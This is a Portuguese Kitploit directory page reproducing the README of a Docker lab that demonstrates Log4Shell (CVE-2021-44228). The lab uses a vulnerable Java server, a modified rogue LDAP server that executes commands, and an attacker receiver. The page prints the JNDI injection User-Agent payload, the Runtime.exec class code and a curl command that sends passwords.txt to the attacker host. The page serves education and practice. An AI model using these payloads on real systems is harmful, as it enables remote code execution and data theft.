Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228-docker-example — Demonstração baseada em Docker da exploração do CVE-2021-44228 (Log4Shell), apresentando um servidor Java vulnerável, um servidor LDAP malicioso e exfiltração de dados para um receptor controlado pelo atacante. | Kitploit
Ferramentas/GitHubGitHub/dicanio/cve-2021-44228-docker-example
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosAprendizado e EducaçãoLabs e Prática
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

Demonstração baseada em Docker da exploração do CVE-2021-44228 (Log4Shell), apresentando um servidor Java vulnerável, um servidor LDAP malicioso e exfiltração de dados para um receptor controlado pelo atacante.

Ver Repositório
14há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44228-docker-example

Uma demonstração simples do CVE-2021-44228 para transferir dados de um servidor vulnerável para um serviço web controlado por um atacante. Todos os componentes envolvidos estão rodando via Docker.

Componentes

vulnerable-server

Este é um servidor Java padrão agindo como a vítima. Está rodando:

  • Java 8u111
  • Web Application (Spring Boot 2.6.1)
  • Log4J

Este servidor está VULNERÁVEL usando esta configuração.

Informações Adicionais:

  • endpoint em /logging (GET) irá registrar o user agent usando Log4J
  • /foo/passwords.txt existe (alvo do atacante)

Conteúdo de passwords.txt:

root@kitploit:~
my secret

malicious-receiver

Este é um servidor Java padrão agindo como o coletor de dados do atacante. Está rodando:

  • Java 17
  • Web Application (Spring Boot 2.6.1)

Informações adicionais:

  • endpoint em receiver (POST) irá registrar o corpo da requisição

malicious-ldap

Este é um servidor LDAP alimentado por rogue-jndi. Sua classe ExportJava foi modificada para que comandos passados via a flag -c sejam executados.

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

Quando requisitado pelo servidor vulnerável, ele responderá com uma classe executando o seguinte comando quando instanciada:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

Isso efetivamente enviará o conteúdo de /foo/passwords.txt para o endpoint preparado do receptor malicioso.

Uso

  1. configurar as imagens Docker executando:
    root@kitploit:~
    ./build.sh
    
  2. iniciar os contêineres dos componentes executando:
    root@kitploit:~
    ./start.sh
    
  3. acionar a vulnerabilidade executando:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. verificar a saída de log do componente receptor malicioso executando:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    Deve haver o conteúdo do arquivo passwords.txt do servidor.
  5. parar os contêineres dos componentes executando:
    root@kitploit:~
    ./stop.sh
    
Baixar ferramenta